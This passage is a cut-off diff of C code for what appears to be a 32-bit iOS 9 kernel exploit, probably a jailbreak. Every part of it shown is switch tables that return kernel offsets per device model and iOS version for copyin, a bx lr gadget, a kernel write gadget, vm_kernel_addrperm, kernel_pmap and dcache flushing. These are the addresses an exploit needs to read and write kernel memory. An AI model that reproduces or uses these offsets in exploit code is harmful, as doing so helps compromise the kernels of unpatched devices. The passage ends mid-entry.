iPad32_iOS931: return 0x403428; + case iPad32_iOS932: return 0x403428; + case iPad32_iOS933: return 0x403428; + case iPad32_iOS934: return 0x403428; + case iPad33_iOS902: return 0x4043c0; + case iPad33_iOS910: return 0x4053cc; + case iPad33_iOS920: return 0x3fc3dc; + case iPad33_iOS921: return 0x3fc3dc; + case iPad33_iOS930: return 0x403428; + case iPad33_iOS931: return 0x403428; + case iPad33_iOS932: return 0x403428; + case iPad33_iOS933: return 0x403428; + case iPad33_iOS934: return 0x403428; + case iPad34_iOS910: return 0x40c3cc; + case iPad34_iOS920: return 0x4033dc; + case iPad34_iOS921: return 0x4033dc; + case iPad34_iOS930: return 0x403428; + case iPad34_iOS931: return 0x40b428; + case iPad34_iOS932: return 0x40b428; + case iPad34_iOS933: return 0x40b428; + case iPad34_iOS934: return 0x40b428; + case iPad35_iOS910: return 0x40c3cc; + case iPad35_iOS920: return 0x4033dc; + case iPad35_iOS921: return 0x4033dc; + case iPad35_iOS930: return 0x403428; + case iPad35_iOS931: return 0x40b428; + case iPad35_iOS932: return 0x40b428; + case iPad35_iOS933: return 0x40b428; + case iPad35_iOS934: return 0x40b428; + case iPad36_iOS910: return 0x40c3cc; + case iPad36_iOS920: return 0x4033dc; + case iPad36_iOS921: return 0x4033dc; + case iPad36_iOS930: return 0x403428; + case iPad36_iOS931: return 0x40b428; + case iPad36_iOS932: return 0x40b428; + case iPad36_iOS933: return 0x40b428; + case iPad36_iOS934: return 0x40b428; + case iPod51_iOS910: return 0x4053cc; + case iPod51_iOS920: return 0x3fc3dc; + case iPod51_iOS921: return 0x3fc3dc; + case iPod51_iOS930: return 0x403428; + case iPod51_iOS931: return 0x403428; + case iPod51_iOS932: return 0x403428; + case iPod51_iOS933: return 0x403428; + case iPod51_iOS934: return 0x403428; + default: return 0; + } +} + +static inline unsigned int find_copyin(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xc7754; + case iPhone41_iOS910: return 0xc7754; + case iPhone41_iOS920: return 0xc6754; + case iPhone41_iOS921: return 0xc6754; + case iPhone41_iOS930: return 0xc76b4; + case iPhone41_iOS931: return 0xc76b4; + case iPhone41_iOS932: return 0xc76b4; + case iPhone41_iOS933: return 0xc76b4; + case iPhone41_iOS934: return 0xc76b4; + case iPhone51_iOS910: return 0xcb87c; + case iPhone51_iOS920: return 0xca87c; + case iPhone51_iOS921: return 0xca87c; + case iPhone51_iOS930: return 0xcb7dc; + case iPhone51_iOS931: return 0xcb7dc; + case iPhone51_iOS932: return 0xcb7dc; + case iPhone51_iOS933: return 0xcb7dc; + case iPhone51_iOS934: return 0xcb7dc; + case iPhone52_iOS902: return 0xcb87c; + case iPhone52_iOS910: return 0xcb87c; + case iPhone52_iOS920: return 0xca87c; + case iPhone52_iOS921: return 0xca87c; + case iPhone52_iOS930: return 0xcb7dc; + case iPhone52_iOS931: return 0xcb7dc; + case iPhone52_iOS932: return 0xcb7dc; + case iPhone52_iOS933: return 0xcb7dc; + case iPhone52_iOS934: return 0xcb7dc; + case iPhone53_iOS910: return 0xcb87c; + case iPhone53_iOS920: return 0xca87c; + case iPhone53_iOS921: return 0xca87c; + case iPhone53_iOS930: return 0xcb7dc; + case iPhone53_iOS931: return 0xcb7dc; + case iPhone53_iOS932: return 0xcb7dc; + case iPhone53_iOS933: return 0xcb7dc; + case iPhone53_iOS934: return 0xcb7dc; + case iPhone54_iOS910: return 0xcb87c; + case iPhone54_iOS920: return 0xca87c; + case iPhone54_iOS921: return 0xca87c; + case iPhone54_iOS930: return 0xcb7dc; + case iPhone54_iOS931: return 0xcb7dc; + case iPhone54_iOS932: return 0xcb7dc; + case iPhone54_iOS933: return 0xcb7dc; + case iPhone54_iOS934: return 0xcb7dc; + case iPad21_iOS910: return 0xc7754; + case iPad21_iOS920: return 0xc6754; + case iPad21_iOS921: return 0xc6754; + case iPad21_iOS930: return 0xc76b4; + case iPad21_iOS931: return 0xc76b4; + case iPad21_iOS932: return 0xc76b4; + case iPad21_iOS933: return 0xc76b4; + case iPad21_iOS934: return 0xc76b4; + case iPad22_iOS910: return 0xc7754; + case iPad22_iOS920: return 0xc6754; + case iPad22_iOS921: return 0xc6754; + case iPad22_iOS930: return 0xc76b4; + case iPad22_iOS931: return 0xc76b4; + case iPad22_iOS932: return 0xc76b4; + case iPad22_iOS933: return 0xc76b4; + case iPad22_iOS934: return 0xc76b4; + case iPad23_iOS910: return 0xc7754; + case iPad23_iOS920: return 0xc6754; + case iPad23_iOS921: return 0xc6754; + case iPad23_iOS930: return 0xc76b4; + case iPad23_iOS931: return 0xc76b4; + case iPad23_iOS932: return 0xc76b4; + case iPad23_iOS933: return 0xc76b4; + case iPad23_iOS934: return 0xc76b4; + case iPad24_iOS910: return 0xc7754; + case iPad24_iOS920: return 0xc6754; + case iPad24_iOS921: return 0xc6754; + case iPad24_iOS930: return 0xc76b4; + case iPad24_iOS931: return 0xc76b4; + case iPad24_iOS932: return 0xc76b4; + case iPad24_iOS933: return 0xc76b4; + case iPad24_iOS934: return 0xc76b4; + case iPad25_iOS902: return 0xc7754; + case iPad31_iOS910: return 0xc7754; + case iPad31_iOS920: return 0xc6754; + case iPad31_iOS921: return 0xc6754; + case iPad31_iOS930: return 0xc76b4; + case iPad31_iOS931: return 0xc76b4; + case iPad31_iOS932: return 0xc76b4; + case iPad31_iOS933: return 0xc76b4; + case iPad31_iOS934: return 0xc76b4; + case iPad32_iOS910: return 0xc7754; + case iPad32_iOS920: return 0xc6754; + case iPad32_iOS921: return 0xc6754; + case iPad32_iOS930: return 0xc76b4; + case iPad32_iOS931: return 0xc76b4; + case iPad32_iOS932: return 0xc76b4; + case iPad32_iOS933: return 0xc76b4; + case iPad32_iOS934: return 0xc76b4; + case iPad33_iOS902: return 0xc7754; + case iPad33_iOS910: return 0xc7754; + case iPad33_iOS920: return 0xc6754; + case iPad33_iOS921: return 0xc6754; + case iPad33_iOS930: return 0xc76b4; + case iPad33_iOS931: return 0xc76b4; + case iPad33_iOS932: return 0xc76b4; + case iPad33_iOS933: return 0xc76b4; + case iPad33_iOS934: return 0xc76b4; + case iPad34_iOS910: return 0xcb87c; + case iPad34_iOS920: return 0xca87c; + case iPad34_iOS921: return 0xca87c; + case iPad34_iOS930: return 0xcb7dc; + case iPad34_iOS931: return 0xcb7dc; + case iPad34_iOS932: return 0xcb7dc; + case iPad34_iOS933: return 0xcb7dc; + case iPad34_iOS934: return 0xcb7dc; + case iPad35_iOS910: return 0xcb87c; + case iPad35_iOS920: return 0xca87c; + case iPad35_iOS921: return 0xca87c; + case iPad35_iOS930: return 0xcb7dc; + case iPad35_iOS931: return 0xcb7dc; + case iPad35_iOS932: return 0xcb7dc; + case iPad35_iOS933: return 0xcb7dc; + case iPad35_iOS934: return 0xcb7dc; + case iPad36_iOS910: return 0xcb87c; + case iPad36_iOS920: return 0xca87c; + case iPad36_iOS921: return 0xca87c; + case iPad36_iOS930: return 0xcb7dc; + case iPad36_iOS931: return 0xcb7dc; + case iPad36_iOS932: return 0xcb7dc; + case iPad36_iOS933: return 0xcb7dc; + case iPad36_iOS934: return 0xcb7dc; + case iPod51_iOS910: return 0xc7754; + case iPod51_iOS920: return 0xc6754; + case iPod51_iOS921: return 0xc6754; + case iPod51_iOS930: return 0xc76b4; + case iPod51_iOS931: return 0xc76b4; + case iPod51_iOS932: return 0xc76b4; + case iPod51_iOS933: return 0xc76b4; + case iPod51_iOS934: return 0xc76b4; + default: return 0; + } +} + +static inline unsigned int find_bx_lr(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xd97d2; + case iPhone41_iOS910: return 0xd97d2; + case iPhone41_iOS920: return 0xd8752; + case iPhone41_iOS921: return 0xd8752; + case iPhone41_iOS930: return 0xd984a; + case iPhone41_iOS931: return 0xd984a; + case iPhone41_iOS932: return 0xd984a; + case iPhone41_iOS933: return 0xd983a; + case iPhone41_iOS934: return 0xd983a; + case iPhone51_iOS910: return 0xde9fe; + case iPhone51_iOS920: return 0xdd9de; + case iPhone51_iOS921: return 0xdd9de; + case iPhone51_iOS930: return 0xdea4a; + case iPhone51_iOS931: return 0xdea4a; + case iPhone51_iOS932: return 0xdea4a; + case iPhone51_iOS933: return 0xdea4a; + case iPhone51_iOS934: return 0xdea4a; + case iPhone52_iOS902: return 0xde9fe; + case iPhone52_iOS910: return 0xde9fe; + case iPhone52_iOS920: return 0xdd9de; + case iPhone52_iOS921: return 0xdd9de; + case iPhone52_iOS930: return 0xdea4a; + case iPhone52_iOS931: return 0xdea4a; + case iPhone52_iOS932: return 0xdea4a; + case iPhone52_iOS933: return 0xdea4a; + case iPhone52_iOS934: return 0xdea4a; + case iPhone53_iOS910: return 0xde9fe; + case iPhone53_iOS920: return 0xdd9de; + case iPhone53_iOS921: return 0xdd9de; + case iPhone53_iOS930: return 0xdea4a; + case iPhone53_iOS931: return 0xdea4a; + case iPhone53_iOS932: return 0xdea4a; + case iPhone53_iOS933: return 0xdea4a; + case iPhone53_iOS934: return 0xdea4a; + case iPhone54_iOS910: return 0xde9fe; + case iPhone54_iOS920: return 0xdd9de; + case iPhone54_iOS921: return 0xdd9de; + case iPhone54_iOS930: return 0xdea4a; + case iPhone54_iOS931: return 0xdea4a; + case iPhone54_iOS932: return 0xdea4a; + case iPhone54_iOS933: return 0xdea4a; + case iPhone54_iOS934: return 0xdea4a; + case iPad21_iOS910: return 0xd97d2; + case iPad21_iOS920: return 0xd8752; + case iPad21_iOS921: return 0xd8752; + case iPad21_iOS930: return 0xd984a; + case iPad21_iOS931: return 0xd984a; + case iPad21_iOS932: return 0xd984a; + case iPad21_iOS933: return 0xd983a; + case iPad21_iOS934: return 0xd983a; + case iPad22_iOS910: return 0xd97d2; + case iPad22_iOS920: return 0xd8752; + case iPad22_iOS921: return 0xd8752; + case iPad22_iOS930: return 0xd984a; + case iPad22_iOS931: return 0xd984a; + case iPad22_iOS932: return 0xd984a; + case iPad22_iOS933: return 0xd983a; + case iPad22_iOS934: return 0xd983a; + case iPad23_iOS910: return 0xd97d2; + case iPad23_iOS920: return 0xd8752; + case iPad23_iOS921: return 0xd8752; + case iPad23_iOS930: return 0xd984a; + case iPad23_iOS931: return 0xd984a; + case iPad23_iOS932: return 0xd984a; + case iPad23_iOS933: return 0xd983a; + case iPad23_iOS934: return 0xd983a; + case iPad24_iOS910: return 0xd97d2; + case iPad24_iOS920: return 0xd8752; + case iPad24_iOS921: return 0xd8752; + case iPad24_iOS930: return 0xd984a; + case iPad24_iOS931: return 0xd984a; + case iPad24_iOS932: return 0xd984a; + case iPad24_iOS933: return 0xd983a; + case iPad24_iOS934: return 0xd983a; + case iPad25_iOS902: return 0xd97d2; + case iPad31_iOS910: return 0xd97d2; + case iPad31_iOS920: return 0xd8752; + case iPad31_iOS921: return 0xd8752; + case iPad31_iOS930: return 0xd984a; + case iPad31_iOS931: return 0xd984a; + case iPad31_iOS932: return 0xd984a; + case iPad31_iOS933: return 0xd983a; + case iPad31_iOS934: return 0xd983a; + case iPad32_iOS910: return 0xd97d2; + case iPad32_iOS920: return 0xd8752; + case iPad32_iOS921: return 0xd8752; + case iPad32_iOS930: return 0xd984a; + case iPad32_iOS931: return 0xd984a; + case iPad32_iOS932: return 0xd984a; + case iPad32_iOS933: return 0xd983a; + case iPad32_iOS934: return 0xd983a; + case iPad33_iOS902: return 0xd97d2; + case iPad33_iOS910: return 0xd97d2; + case iPad33_iOS920: return 0xd8752; + case iPad33_iOS921: return 0xd8752; + case iPad33_iOS930: return 0xd984a; + case iPad33_iOS931: return 0xd984a; + case iPad33_iOS932: return 0xd984a; + case iPad33_iOS933: return 0xd983a; + case iPad33_iOS934: return 0xd983a; + case iPad34_iOS910: return 0xde9fe; + case iPad34_iOS920: return 0xdd9de; + case iPad34_iOS921: return 0xdd9de; + case iPad34_iOS930: return 0xdea4a; + case iPad34_iOS931: return 0xdea4a; + case iPad34_iOS932: return 0xdea4a; + case iPad34_iOS933: return 0xdea4a; + case iPad34_iOS934: return 0xdea4a; + case iPad35_iOS910: return 0xde9fe; + case iPad35_iOS920: return 0xdd9de; + case iPad35_iOS921: return 0xdd9de; + case iPad35_iOS930: return 0xdea4a; + case iPad35_iOS931: return 0xdea4a; + case iPad35_iOS932: return 0xdea4a; + case iPad35_iOS933: return 0xdea4a; + case iPad35_iOS934: return 0xdea4a; + case iPad36_iOS910: return 0xde9fe; + case iPad36_iOS920: return 0xdd9de; + case iPad36_iOS921: return 0xdd9de; + case iPad36_iOS930: return 0xdea4a; + case iPad36_iOS931: return 0xdea4a; + case iPad36_iOS932: return 0xdea4a; + case iPad36_iOS933: return 0xdea4a; + case iPad36_iOS934: return 0xdea4a; + case iPod51_iOS910: return 0xd97d2; + case iPod51_iOS920: return 0xd8752; + case iPod51_iOS921: return 0xd8752; + case iPod51_iOS930: return 0xd984a; + case iPod51_iOS931: return 0xd984a; + case iPod51_iOS932: return 0xd984a; + case iPod51_iOS933: return 0xd983a; + case iPod51_iOS934: return 0xd983a; + default: return 0; + } +} + +static inline unsigned int find_write_gadget(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xc7488; + case iPhone41_iOS910: return 0xc7488; + case iPhone41_iOS920: return 0xc6488; + case iPhone41_iOS921: return 0xc6488; + case iPhone41_iOS930: return 0xc73e8; + case iPhone41_iOS931: return 0xc73e8; + case iPhone41_iOS932: return 0xc73e8; + case iPhone41_iOS933: return 0xc73e8; + case iPhone41_iOS934: return 0xc73e8; + case iPhone51_iOS910: return 0xcb5a8; + case iPhone51_iOS920: return 0xca5a8; + case iPhone51_iOS921: return 0xca5a8; + case iPhone51_iOS930: return 0xcb508; + case iPhone51_iOS931: return 0xcb508; + case iPhone51_iOS932: return 0xcb508; + case iPhone51_iOS933: return 0xcb508; + case iPhone51_iOS934: return 0xcb508; + case iPhone52_iOS902: return 0xcb5a8; + case iPhone52_iOS910: return 0xcb5a8; + case iPhone52_iOS920: return 0xca5a8; + case iPhone52_iOS921: return 0xca5a8; + case iPhone52_iOS930: return 0xcb508; + case iPhone52_iOS931: return 0xcb508; + case iPhone52_iOS932: return 0xcb508; + case iPhone52_iOS933: return 0xcb508; + case iPhone52_iOS934: return 0xcb508; + case iPhone53_iOS910: return 0xcb5a8; + case iPhone53_iOS920: return 0xca5a8; + case iPhone53_iOS921: return 0xca5a8; + case iPhone53_iOS930: return 0xcb508; + case iPhone53_iOS931: return 0xcb508; + case iPhone53_iOS932: return 0xcb508; + case iPhone53_iOS933: return 0xcb508; + case iPhone53_iOS934: return 0xcb508; + case iPhone54_iOS910: return 0xcb5a8; + case iPhone54_iOS920: return 0xca5a8; + case iPhone54_iOS921: return 0xca5a8; + case iPhone54_iOS930: return 0xcb508; + case iPhone54_iOS931: return 0xcb508; + case iPhone54_iOS932: return 0xcb508; + case iPhone54_iOS933: return 0xcb508; + case iPhone54_iOS934: return 0xcb508; + case iPad21_iOS910: return 0xc7488; + case iPad21_iOS920: return 0xc6488; + case iPad21_iOS921: return 0xc6488; + case iPad21_iOS930: return 0xc73e8; + case iPad21_iOS931: return 0xc73e8; + case iPad21_iOS932: return 0xc73e8; + case iPad21_iOS933: return 0xc73e8; + case iPad21_iOS934: return 0xc73e8; + case iPad22_iOS910: return 0xc7488; + case iPad22_iOS920: return 0xc6488; + case iPad22_iOS921: return 0xc6488; + case iPad22_iOS930: return 0xc73e8; + case iPad22_iOS931: return 0xc73e8; + case iPad22_iOS932: return 0xc73e8; + case iPad22_iOS933: return 0xc73e8; + case iPad22_iOS934: return 0xc73e8; + case iPad23_iOS910: return 0xc7488; + case iPad23_iOS920: return 0xc6488; + case iPad23_iOS921: return 0xc6488; + case iPad23_iOS930: return 0xc73e8; + case iPad23_iOS931: return 0xc73e8; + case iPad23_iOS932: return 0xc73e8; + case iPad23_iOS933: return 0xc73e8; + case iPad23_iOS934: return 0xc73e8; + case iPad24_iOS910: return 0xc7488; + case iPad24_iOS920: return 0xc6488; + case iPad24_iOS921: return 0xc6488; + case iPad24_iOS930: return 0xc73e8; + case iPad24_iOS931: return 0xc73e8; + case iPad24_iOS932: return 0xc73e8; + case iPad24_iOS933: return 0xc73e8; + case iPad24_iOS934: return 0xc73e8; + case iPad25_iOS902: return 0xc7488; + case iPad31_iOS910: return 0xc7488; + case iPad31_iOS920: return 0xc6488; + case iPad31_iOS921: return 0xc6488; + case iPad31_iOS930: return 0xc73e8; + case iPad31_iOS931: return 0xc73e8; + case iPad31_iOS932: return 0xc73e8; + case iPad31_iOS933: return 0xc73e8; + case iPad31_iOS934: return 0xc73e8; + case iPad32_iOS910: return 0xc7488; + case iPad32_iOS920: return 0xc6488; + case iPad32_iOS921: return 0xc6488; + case iPad32_iOS930: return 0xc73e8; + case iPad32_iOS931: return 0xc73e8; + case iPad32_iOS932: return 0xc73e8; + case iPad32_iOS933: return 0xc73e8; + case iPad32_iOS934: return 0xc73e8; + case iPad33_iOS902: return 0xc7488; + case iPad33_iOS910: return 0xc7488; + case iPad33_iOS920: return 0xc6488; + case iPad33_iOS921: return 0xc6488; + case iPad33_iOS930: return 0xc73e8; + case iPad33_iOS931: return 0xc73e8; + case iPad33_iOS932: return 0xc73e8; + case iPad33_iOS933: return 0xc73e8; + case iPad33_iOS934: return 0xc73e8; + case iPad34_iOS910: return 0xcb5a8; + case iPad34_iOS920: return 0xca5a8; + case iPad34_iOS921: return 0xca5a8; + case iPad34_iOS930: return 0xcb508; + case iPad34_iOS931: return 0xcb508; + case iPad34_iOS932: return 0xcb508; + case iPad34_iOS933: return 0xcb508; + case iPad34_iOS934: return 0xcb508; + case iPad35_iOS910: return 0xcb5a8; + case iPad35_iOS920: return 0xca5a8; + case iPad35_iOS921: return 0xca5a8; + case iPad35_iOS930: return 0xcb508; + case iPad35_iOS931: return 0xcb508; + case iPad35_iOS932: return 0xcb508; + case iPad35_iOS933: return 0xcb508; + case iPad35_iOS934: return 0xcb508; + case iPad36_iOS910: return 0xcb5a8; + case iPad36_iOS920: return 0xca5a8; + case iPad36_iOS921: return 0xca5a8; + case iPad36_iOS930: return 0xcb508; + case iPad36_iOS931: return 0xcb508; + case iPad36_iOS932: return 0xcb508; + case iPad36_iOS933: return 0xcb508; + case iPad36_iOS934: return 0xcb508; + case iPod51_iOS910: return 0xc7488; + case iPod51_iOS920: return 0xc6488; + case iPod51_iOS921: return 0xc6488; + case iPod51_iOS930: return 0xc73e8; + case iPod51_iOS931: return 0xc73e8; + case iPod51_iOS932: return 0xc73e8; + case iPod51_iOS933: return 0xc73e8; + case iPod51_iOS934: return 0xc73e8; + default: return 0; + } +} + +static inline unsigned int find_vm_kernel_addrperm(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x455fa0; + case iPhone41_iOS910: return 0x457030; + case iPhone41_iOS920: return 0x44e840; + case iPhone41_iOS921: return 0x44e840; + case iPhone41_iOS930: return 0x455844; + case iPhone41_iOS931: return 0x455844; + case iPhone41_iOS932: return 0x455844; + case iPhone41_iOS933: return 0x455844; + case iPhone41_iOS934: return 0x455844; + case iPhone51_iOS910: return 0x45e154; + case iPhone51_iOS920: return 0x455964; + case iPhone51_iOS921: return 0x455964; + case iPhone51_iOS930: return 0x45d978; + case iPhone51_iOS931: return 0x45d978; + case iPhone51_iOS932: return 0x45d978; + case iPhone51_iOS933: return 0x45d978; + case iPhone51_iOS934: return 0x45d978; + case iPhone52_iOS902: return 0x45c0c4; + case iPhone52_iOS910: return 0x45e154; + case iPhone52_iOS920: return 0x455964; + case iPhone52_iOS921: return 0x455964; + case iPhone52_iOS930: return 0x45d978; + case iPhone52_iOS931: return 0x45d978; + case iPhone52_iOS932: return 0x45d978; + case iPhone52_iOS933: return 0x45d978; + case iPhone52_iOS934: return 0x45d978; + case iPhone53_iOS910: return 0x45e154; + case iPhone53_iOS920: return 0x455964; + case iPhone53_iOS921: return 0x455964; + case iPhone53_iOS930: return 0x45d978; + case iPhone53_iOS931: return 0x45d978; + case iPhone53_iOS932: return 0x45d978; + case iPhone53_iOS933: return 0x45d978; + case iPhone53_iOS934: return 0x45d978; + case iPhone54_iOS910: return 0x45e154; + case iPhone54_iOS920: return 0x455964; + case iPhone54_iOS921: return 0x455964; + case iPhone54_iOS930: return 0x45D978; + case iPhone54_iOS931: return 0x45d978; + case iPhone54_iOS932: return 0x45d978; + case iPhone54_iOS933: return 0x45d978; + case iPhone54_iOS934: return 0x45d978; + case iPad21_iOS910: return 0x457030; + case iPad21_iOS920: return 0x44e840; + case iPad21_iOS921: return 0x44e840; + case iPad21_iOS930: return 0x455844; + case iPad21_iOS931: return 0x455844; + case iPad21_iOS932: return 0x455844; + case iPad21_iOS933: return 0x455844; + case iPad21_iOS934: return 0x455844; + case iPad22_iOS910: return 0x457030; + case iPad22_iOS920: return 0x44e840; + case iPad22_iOS921: return 0x44e840; + case iPad22_iOS930: return 0x455844; + case iPad22_iOS931: return 0x455844; + case iPad22_iOS932: return 0x455844; + case iPad22_iOS933: return 0x455844; + case iPad22_iOS934: return 0x455844; + case iPad23_iOS910: return 0x457030; + case iPad23_iOS920: return 0x44e840; + case iPad23_iOS921: return 0x44e840; + case iPad23_iOS930: return 0x455844; + case iPad23_iOS931: return 0x455844; + case iPad23_iOS932: return 0x455844; + case iPad23_iOS933: return 0x455844; + case iPad23_iOS934: return 0x455844; + case iPad24_iOS910: return 0x457030; + case iPad24_iOS920: return 0x44e840; + case iPad24_iOS921: return 0x44e840; + case iPad24_iOS930: return 0x455844; + case iPad24_iOS931: return 0x455844; + case iPad24_iOS932: return 0x455844; + case iPad24_iOS933: return 0x455844; + case iPad24_iOS934: return 0x455844; + case iPad25_iOS902: return 0x455fa0; + case iPad31_iOS910: return 0x457030; + case iPad31_iOS920: return 0x44e840; + case iPad31_iOS921: return 0x44e840; + case iPad31_iOS930: return 0x455844; + case iPad31_iOS931: return 0x455844; + case iPad31_iOS932: return 0x455844; + case iPad31_iOS933: return 0x455844; + case iPad31_iOS934: return 0x455844; + case iPad32_iOS910: return 0x457030; + case iPad32_iOS920: return 0x44e840; + case iPad32_iOS921: return 0x44e840; + case iPad32_iOS930: return 0x455844; + case iPad32_iOS931: return 0x455844; + case iPad32_iOS932: return 0x455844; + case iPad32_iOS933: return 0x455844; + case iPad32_iOS934: return 0x455844; + case iPad33_iOS902: return 0x455fa0; + case iPad33_iOS910: return 0x457030; + case iPad33_iOS920: return 0x44e840; + case iPad33_iOS921: return 0x44e840; + case iPad33_iOS930: return 0x455844; + case iPad33_iOS931: return 0x455844; + case iPad33_iOS932: return 0x455844; + case iPad33_iOS933: return 0x455844; + case iPad33_iOS934: return 0x455844; + case iPad34_iOS910: return 0x45e154; + case iPad34_iOS920: return 0x455964; + case iPad34_iOS921: return 0x455964; + case iPad34_iOS930: return 0x45d978; + case iPad34_iOS931: return 0x45d978; + case iPad34_iOS932: return 0x45d978; + case iPad34_iOS933: return 0x45d978; + case iPad34_iOS934: return 0x45d978; + case iPad35_iOS910: return 0x45e154; + case iPad35_iOS920: return 0x455964; + case iPad35_iOS921: return 0x455964; + case iPad35_iOS930: return 0x45d978; + case iPad35_iOS931: return 0x45d978; + case iPad35_iOS932: return 0x45d978; + case iPad35_iOS933: return 0x45d978; + case iPad35_iOS934: return 0x45d978; + case iPad36_iOS910: return 0x45e154; + case iPad36_iOS920: return 0x455964; + case iPad36_iOS921: return 0x455964; + case iPad36_iOS930: return 0x45d978; + case iPad36_iOS931: return 0x45d978; + case iPad36_iOS932: return 0x45d978; + case iPad36_iOS933: return 0x45d978; + case iPad36_iOS934: return 0x45d978; + case iPod51_iOS910: return 0x457030; + case iPod51_iOS920: return 0x44e840; + case iPod51_iOS921: return 0x44e840; + case iPod51_iOS930: return 0x455844; + case iPod51_iOS931: return 0x455844; + case iPod51_iOS932: return 0x455844; + case iPod51_iOS933: return 0x455844; + case iPod51_iOS934: return 0x455844; + default: return 0; + } +} + +static inline unsigned int find_kernel_pmap(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0x3f7444; + case iPhone41_iOS910: return 0x3f8444; + case iPhone41_iOS920: return 0x3ef444; + case iPhone41_iOS921: return 0x3ef444; + case iPhone41_iOS930: return 0x3f6454; + case iPhone41_iOS931: return 0x3f6454; + case iPhone41_iOS932: return 0x3f6454; + case iPhone41_iOS933: return 0x3f6454; + case iPhone41_iOS934: return 0x3f6454; + case iPhone51_iOS910: return 0x3ff444; + case iPhone51_iOS920: return 0x3f6444; + case iPhone51_iOS921: return 0x3f6444; + case iPhone51_iOS930: return 0x3fe454; + case iPhone51_iOS931: return 0x3fe454; + case iPhone51_iOS932: return 0x3fe454; + case iPhone51_iOS933: return 0x3fe454; + case iPhone51_iOS934: return 0x3fe454; + case iPhone52_iOS902: return 0x3fd444; + case iPhone52_iOS910: return 0x3ff444; + case iPhone52_iOS920: return 0x3f6444; + case iPhone52_iOS921: return 0x3f6444; + case iPhone52_iOS930: return 0x3fe454; + case iPhone52_iOS931: return 0x3fe454; + case iPhone52_iOS932: return 0x3fe454; + case iPhone52_iOS933: return 0x3fe454; + case iPhone52_iOS934: return 0x3fe454; + case iPhone53_iOS910: return 0x3ff444; + case iPhone53_iOS920: return 0x3f6444; + case iPhone53_iOS921: return 0x3f6444; + case iPhone53_iOS930: return 0x3fe454; + case iPhone53_iOS931: return 0x3fe454; + case iPhone53_iOS932: return 0x3fe454; + case iPhone53_iOS933: return 0x3fe454; + case iPhone53_iOS934: return 0x3fe454; + case iPhone54_iOS910: return 0x3ff444; + case iPhone54_iOS920: return 0x3f6444; + case iPhone54_iOS921: return 0x3f6444; + case iPhone54_iOS930: return 0x3fe454; + case iPhone54_iOS931: return 0x3fe454; + case iPhone54_iOS932: return 0x3fe454; + case iPhone54_iOS933: return 0x3fe454; + case iPhone54_iOS934: return 0x3fe454; + case iPad21_iOS910: return 0x3f8444; + case iPad21_iOS920: return 0x3ef444; + case iPad21_iOS921: return 0x3ef444; + case iPad21_iOS930: return 0x3f6454; + case iPad21_iOS931: return 0x3f6454; + case iPad21_iOS932: return 0x3f6454; + case iPad21_iOS933: return 0x3f6454; + case iPad21_iOS934: return 0x3f6454; + case iPad22_iOS910: return 0x3f8444; + case iPad22_iOS920: return 0x3ef444; + case iPad22_iOS921: return 0x3ef444; + case iPad22_iOS930: return 0x3f6454; + case iPad22_iOS931: return 0x3f6454; + case iPad22_iOS932: return 0x3f6454; + case iPad22_iOS933: return 0x3f6454; + case iPad22_iOS934: return 0x3f6454; + case iPad23_iOS910: return 0x3f8444; + case iPad23_iOS920: return 0x3ef444; + case iPad23_iOS921: return 0x3ef444; + case iPad23_iOS930: return 0x3f6454; + case iPad23_iOS931: return 0x3f6454; + case iPad23_iOS932: return 0x3f6454; + case iPad23_iOS933: return 0x3f6454; + case iPad23_iOS934: return 0x3f6454; + case iPad24_iOS910: return 0x3f8444; + case iPad24_iOS920: return 0x3ef444; + case iPad24_iOS921: return 0x3ef444; + case iPad24_iOS930: return 0x3f6454; + case iPad24_iOS931: return 0x3f6454; + case iPad24_iOS932: return 0x3f6454; + case iPad24_iOS933: return 0x3f6454; + case iPad24_iOS934: return 0x3f6454; + case iPad25_iOS902: return 0x3f7444; + case iPad31_iOS910: return 0x3f8444; + case iPad31_iOS920: return 0x3ef444; + case iPad31_iOS921: return 0x3ef444; + case iPad31_iOS930: return 0x3f6454; + case iPad31_iOS931: return 0x3f6454; + case iPad31_iOS932: return 0x3f6454; + case iPad31_iOS933: return 0x3f6454; + case iPad31_iOS934: return 0x3f6454; + case iPad32_iOS910: return 0x3f8444; + case iPad32_iOS920: return 0x3ef444; + case iPad32_iOS921: return 0x3ef444; + case iPad32_iOS930: return 0x3f6454; + case iPad32_iOS931: return 0x3f6454; + case iPad32_iOS932: return 0x3f6454; + case iPad32_iOS933: return 0x3f6454; + case iPad32_iOS934: return 0x3f6454; + case iPad33_iOS902: return 0x3f7444; + case iPad33_iOS910: return 0x3f8444; + case iPad33_iOS920: return 0x3ef444; + case iPad33_iOS921: return 0x3ef444; + case iPad33_iOS930: return 0x3f6454; + case iPad33_iOS931: return 0x3f6454; + case iPad33_iOS932: return 0x3f6454; + case iPad33_iOS933: return 0x3f6454; + case iPad33_iOS934: return 0x3f6454; + case iPad34_iOS910: return 0x3ff444; + case iPad34_iOS920: return 0x3f6444; + case iPad34_iOS921: return 0x3f6444; + case iPad34_iOS930: return 0x3fe454; + case iPad34_iOS931: return 0x3fe454; + case iPad34_iOS932: return 0x3fe454; + case iPad34_iOS933: return 0x3fe454; + case iPad34_iOS934: return 0x3fe454; + case iPad35_iOS910: return 0x3ff444; + case iPad35_iOS920: return 0x3f6444; + case iPad35_iOS921: return 0x3f6444; + case iPad35_iOS930: return 0x3fe454; + case iPad35_iOS931: return 0x3fe454; + case iPad35_iOS932: return 0x3fe454; + case iPad35_iOS933: return 0x3fe454; + case iPad35_iOS934: return 0x3fe454; + case iPad36_iOS910: return 0x3ff444; + case iPad36_iOS920: return 0x3f6444; + case iPad36_iOS921: return 0x3f6444; + case iPad36_iOS930: return 0x3fe454; + case iPad36_iOS931: return 0x3fe454; + case iPad36_iOS932: return 0x3fe454; + case iPad36_iOS933: return 0x3fe454; + case iPad36_iOS934: return 0x3fe454; + case iPod51_iOS910: return 0x3f8444; + case iPod51_iOS920: return 0x3ef444; + case iPod51_iOS921: return 0x3ef444; + case iPod51_iOS930: return 0x3f6454; + case iPod51_iOS931: return 0x3f6454; + case iPod51_iOS932: return 0x3f6454; + case iPod51_iOS933: return 0x3f6454; + case iPod51_iOS934: return 0x3f6454; + default: return 0; + } +} + +static inline unsigned int find_flush_dcache(void) { + switch (target_environment) { + case iPhone41_iOS902: return 0xbc9b8; + case iPhone41_iOS910: return 0xbcb7c; + case iPhone41_iOS920: return 0xbb710; + case iPhone41_iOS921: return 